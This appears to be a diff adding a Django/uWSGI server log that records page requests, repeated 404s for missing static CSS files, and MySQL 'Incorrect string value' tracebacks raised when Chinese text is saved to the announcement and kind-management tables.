+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD...' for column 'k_name' at row 1")
+[pid: 11057|app: 0|req: 1114/1415] 219.228.146.156 () {48 vars in 1029 bytes} [Thu Jan 14 09:06:46 2021] POST /kind-manage/? => generated 207098 bytes in 113 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1115/1416] 219.228.146.156 () {40 vars in 935 bytes} [Thu Jan 14 09:06:47 2021] GET /kind-manage/? => generated 7366 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 52734] hr_write(): Broken pipe [plugins/http/http.c line 565]
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1116/1417] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:06:47 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1117/1418] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:06:47 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1118/1419] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:06:47 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1119/1420] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:47 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1120/1421] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:47 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1121/1422] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:06:47 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 48 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1122/1423] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:06:47 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1123/1424] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:06:47 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1124/1425] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:06:47 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1125/1426] 219.228.146.156 () {40 vars in 936 bytes} [Thu Jan 14 09:06:54 2021] GET /announcement/ => generated 7421 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1126/1427] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:06:55 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1127/1428] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:06:55 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1128/1429] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:55 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1129/1430] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:06:55 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1130/1431] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:06:55 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1131/1432] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:06:55 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 30 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1132/1433] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:06:55 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1133/1434] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:06:55 2021] GET /static/css/animate.css => generated 3513 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1134/1435] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:06:55 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1136/1436] 219.228.146.156 () {40 vars in 937 bytes} [Thu Jan 14 09:07:01 2021] GET /announcement/? => generated 7421 bytes in 41 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Internal Server Error: /announcement/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD' for column 'a_title' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 477, in announcement
+ models.Announcement.objects.create(a_title=a_title, a_content=a_content)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD' for column 'a_title' at row 1")
+[pid: 11057|app: 0|req: 1136/1437] 219.228.146.156 () {48 vars in 1030 bytes} [Thu Jan 14 09:07:01 2021] POST /announcement/ => generated 208408 bytes in 164 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /announcement/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+pymysql.err.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD' for column 'a_title' at row 1")
+
+The above exception was the direct cause of the following exception:
+
+Traceback (most recent call last):
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 477, in announcement
+ models.Announcement.objects.create(a_title=a_title, a_content=a_content)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create
+ obj.save(force_insert=True, using=self.db)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save
+ force_update=force_update, update_fields=update_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base
+ force_update, using, update_fields,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table
+ results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert
+ using=using, raw=raw,
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method
+ return getattr(self.get_queryset(), name)(*args, **kwargs)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert
+ return query.get_compiler(using=using).execute_sql(returning_fields)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql
+ cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute
+ return super().execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute
+ return self._execute_with_wrappers(sql, params, many=False, executor=self._execute)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers
+ return executor(sql, params, many, context)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__
+ raise dj_exc_value.with_traceback(traceback) from exc_value
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute
+ return self.cursor.execute(sql, params)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute
+ return self.cursor.execute(query, args)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute
+ result = self._query(query)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query
+ conn.query(q)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query
+ self._affected_rows = self._read_query_result(unbuffered=unbuffered)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result
+ result.read()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read
+ first_packet = self.connection._read_packet()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet
+ packet.raise_for_error()
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error
+ err.raise_mysql_exception(self._data)
+ File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception
+ raise errorclass(errno, errval)
+django.db.utils.DataError: (1366, "Incorrect string value: '\\xE4\\xBD\\xA0\\xE5\\xA5\\xBD' for column 'a_title' at row 1")
+[pid: 11057|app: 0|req: 1137/1438] 219.228.146.156 () {48 vars in 1030 bytes} [Thu Jan 14 09:07:02 2021] POST /announcement/ => generated 208408 bytes in 108 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1138/1439] 219.228.146.156 () {40 vars in 937 bytes} [Thu Jan 14 09:07:03 2021] GET /announcement/? => generated 7421 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 59134] hr_write(): Broken pipe [plugins/http/http.c line 565]
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1139/1440] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:07:03 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.156 client_port: 59902] hr_write(): Broken pipe [plugins/http/http.c line 565]
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1140/1441] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:07:03 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1141/1442] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:07:03 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1142/1443] 219.228.146.156 () {38 vars in 854 bytes} [Thu Jan 14 09:07:03 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1143/1444] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:07:03 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1144/1445] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:07:03 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 29 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1145/1446] 219.228.146.156 () {38 vars in 930 bytes} [Thu Jan 14 09:07:03 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1146/1447] 219.228.146.156 () {38 vars in 822 bytes} [Thu Jan 14 09:07:03 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1147/1448] 219.228.146.156 () {38 vars in 820 bytes} [Thu Jan 14 09:07:03 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1148/1449] 219.228.146.156 () {48 vars in 1032 bytes} [Thu Jan 14 09:07:17 2021] POST /announcement/? => generated 27 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1149/1450] 219.228.146.156 () {40 vars in 937 bytes} [Thu Jan 14 09:07:19 2021] GET /announcement/ => generated 8247 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1150/1451] 219.228.146.156 () {38 vars in 886 bytes} [Thu Jan 14 09:07:20 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1151/1452] 219.228.146.156 () {38 vars in 898 bytes} [Thu Jan 14 09:07:20 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1152/1453] 219.228.146.156 () {38 vars in 890 bytes} [Thu Jan 14 09:07:20 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1153/1454] 219.228.146.156 () {38 vars in 874 bytes} [Thu Jan 14 09:07:20 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1154/1455] 219.228.146.156 () {38 vars in 872 bytes} [Thu Jan 14 09:07:20 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1155/1456] 219.228.146.156 () {38 vars in 852 bytes} [Thu Jan 14 09:07:20 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1156/1457] 219.228.146.156 () {38 vars in 928 bytes} [Thu Jan 14 09:07:21 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1157/1458] 219.228.146.156 () {38 vars in 821 bytes} [Thu Jan 14 09:07:21 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 11057|app: 0|req: 1158/1459] 219.228.146.156 () {38 vars in 819 bytes} [Thu Jan 14 09:07:21 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 11057|app: 0|req: 1159/1460] 219.228.146.156 () {48 vars in 1029 bytes} [Thu Jan 14 09:07:26 2021] POST /announcement/ => generated 27 bytes in 18 msecs (HTTP/1.1 200) 6 headers in 179 bytes (1 switches on core 0)
+[pid: 11057|app: 0|req: 1160/1461] 219.228.146.156 () {40 vars in 935 bytes} [Thu Jan 14 09:07:26 2021] GET /announcement/ => generated 7421 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 11057|app: 0|req: 1161/1462] 219.228.146.156 () {38 vars in 897 bytes} [Thu Jan 14 09:07:27 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 11057|app: 0|req: 1162/1463] 219.228.146.156 () {38 vars in 885 bytes} [Thu Jan 14 09:07:27 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 11057|app: 0|req: 1163/1464] 219.228.146.156 () {38 vars in 889 bytes} [Thu Jan 14 09:07:27 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 11057|app: 0|req: 1164/1465] 219.228.146.156 () {38 vars in 853 bytes} [Thu Jan 14 09:07:27 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 11057|app: 0|req: 1165/1466] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 09:07:27 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 14 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 11057|app: 0|req: 1166/1467] 219.228.146.156 () {38 vars in 873 bytes} [Thu Jan 14 09:07:27 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/spinners.css
+[pid: 11057|app: 0|req: 1167/1468] 219.228.146.156 () {38 vars in 821 bytes} [Thu Jan 14 09:07:27 2021] GET /static/css/spinners.css => generated 3516 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 11057|app: 0|req: 1168/1469] 219.228.146.156 () {38 vars in 929 bytes} [Thu Jan 14 09:07:27 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /static/css/animate.css
